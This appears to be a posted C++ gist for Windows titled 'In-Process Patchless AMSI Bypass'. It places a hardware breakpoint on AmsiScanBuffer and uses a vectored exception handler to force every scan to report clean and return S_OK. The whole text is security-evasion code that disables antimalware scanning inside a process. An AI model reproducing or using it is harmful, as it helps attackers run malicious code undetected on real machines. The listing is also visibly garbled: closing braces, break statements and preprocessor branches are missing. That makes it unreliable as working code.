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Created April 17, 2022 16:18
In-Process Patchless AMSI Bypass
#include <windows.h>
static const int AMSI_RESULT_CLEAN = 0;
PVOID g_amsiScanBufferPtr = nullptr;
unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) {
unsigned long long mask = (1UL << bits) - 1UL;
dw = (dw & ~(mask << lowBit)) | (newValue << lowBit);
return dw;
void clearBreakpoint(CONTEXT& ctx, int index) {
//Clear the releveant hardware breakpoint
switch (index) {
case 0:
ctx.Dr0 = 0;
case 1:
ctx.Dr1 = 0;
case 2:
ctx.Dr2 = 0;
case 3:
ctx.Dr3 = 0;
//Clear DRx HBP to disable for local mode
ctx.Dr7 = setBits(ctx.Dr7, (index * 2), 1, 0);
ctx.Dr6 = 0;
ctx.EFlags = 0;
void enableBreakpoint(CONTEXT& ctx, PVOID address, int index) {
switch (index) {
case 0:
ctx.Dr0 = (ULONG_PTR)address;
case 1:
ctx.Dr1 = (ULONG_PTR)address;
case 2:
ctx.Dr2 = (ULONG_PTR)address;
case 3:
ctx.Dr3 = (ULONG_PTR)address;
//Set bits 16-31 as 0, which sets
//DR0-DR3 HBP's for execute HBP
ctx.Dr7 = setBits(ctx.Dr7, 16, 16, 0);
//Set DRx HBP as enabled for local mode
ctx.Dr7 = setBits(ctx.Dr7, (index * 2), 1, 1);
ctx.Dr6 = 0;
static void clearHardwareBreakpoint(CONTEXT* ctx, int index) {
//Clear the releveant hardware breakpoint
switch (index) {
case 0:
ctx->Dr0 = 0;
case 1:
ctx->Dr1 = 0;
case 2:
ctx->Dr2 = 0;
case 3:
ctx->Dr3 = 0;
//Clear DRx HBP to disable for local mode
ctx->Dr7 = setBits(ctx->Dr7, (index * 2), 1, 0);
ctx->Dr6 = 0;
ctx->EFlags = 0;
static ULONG_PTR getArg(CONTEXT* ctx, int index){
#ifdef __x86_64
case 0:
return ctx->Rcx;
case 1:
return ctx->Rdx;
case 2:
return ctx->R8;
case 3:
return ctx->R9;
return *(ULONG_PTR*)(ctx->Rsp+((index+1)*8));
return *(DWORD_PTR*)(ctx->Esp+(index+1*4));
static ULONG_PTR getReturnAddress(CONTEXT* ctx){
#ifdef __x86_64
return *(ULONG_PTR*)ctx->Rsp;
return *(ULONG_PTR*)ctx->Esp;
static void setResult(CONTEXT* ctx, ULONG_PTR result){
#ifdef __x86_64
ctx->Rax = result;
ctx->Eax = result;
static void adjustStackPointer(CONTEXT* ctx, int amount){
#ifdef __x86_64
ctx->Rsp += amount;
ctx->Esp += amount;
static void setIP(CONTEXT* ctx, ULONG_PTR newIP){
#ifdef __x86_64
ctx->Rip = newIP;
ctx->Eip = newIP;
LONG WINAPI exceptionHandler(PEXCEPTION_POINTERS exceptions){
if(exceptions->ExceptionRecord->ExceptionCode == EXCEPTION_SINGLE_STEP && exceptions->ExceptionRecord->ExceptionAddress == g_amsiScanBufferPtr){
//Get the return address by reading the value currently stored at the stack pointer
ULONG_PTR returnAddress = getReturnAddress(exceptions->ContextRecord);
//Get the address of the 5th argument, which is an int* and set it to a clean result
int* scanResult = (int*)getArg(exceptions->ContextRecord, 5);
*scanResult = AMSI_RESULT_CLEAN;
//update the current instruction pointer to the caller of AmsiScanBuffer
setIP(exceptions->ContextRecord, returnAddress);
//We need to adjust the stack pointer accordinly too so that we simulate a ret instruction
adjustStackPointer(exceptions->ContextRecord, sizeof(PVOID));
//Set the eax/rax register to 0 (S_OK) indicatring to the caller that AmsiScanBuffer finished successfully
setResult(exceptions->ContextRecord, S_OK);
//Clear the hardware breakpoint, since we are now done with it
clearHardwareBreakpoint(exceptions->ContextRecord, 0);
HANDLE setupAMSIBypass(){
CONTEXT threadCtx;
memset(&threadCtx, 0, sizeof(threadCtx));
threadCtx.ContextFlags = CONTEXT_ALL;
//Load amsi.dll if it hasn't be loaded alreay.
if(g_amsiScanBufferPtr == nullptr){
HMODULE amsi = GetModuleHandleA("amsi.dll");
if(amsi == nullptr){
amsi = LoadLibraryA("amsi.dll");
if(amsi != nullptr){
g_amsiScanBufferPtr = (PVOID)GetProcAddress(amsi, "AmsiScanBuffer");
return nullptr;
if(g_amsiScanBufferPtr == nullptr)
return nullptr;
//add our vectored exception handle
HANDLE hExHandler = AddVectoredExceptionHandler(1, exceptionHandler);
//Set a hardware breakpoint on AmsiScanBuffer function
if(GetThreadContext((HANDLE)-2, &threadCtx)){
enableBreakpoint(threadCtx, g_amsiScanBufferPtr, 0);
SetThreadContext((HANDLE)-2, &threadCtx);
return hExHandler;
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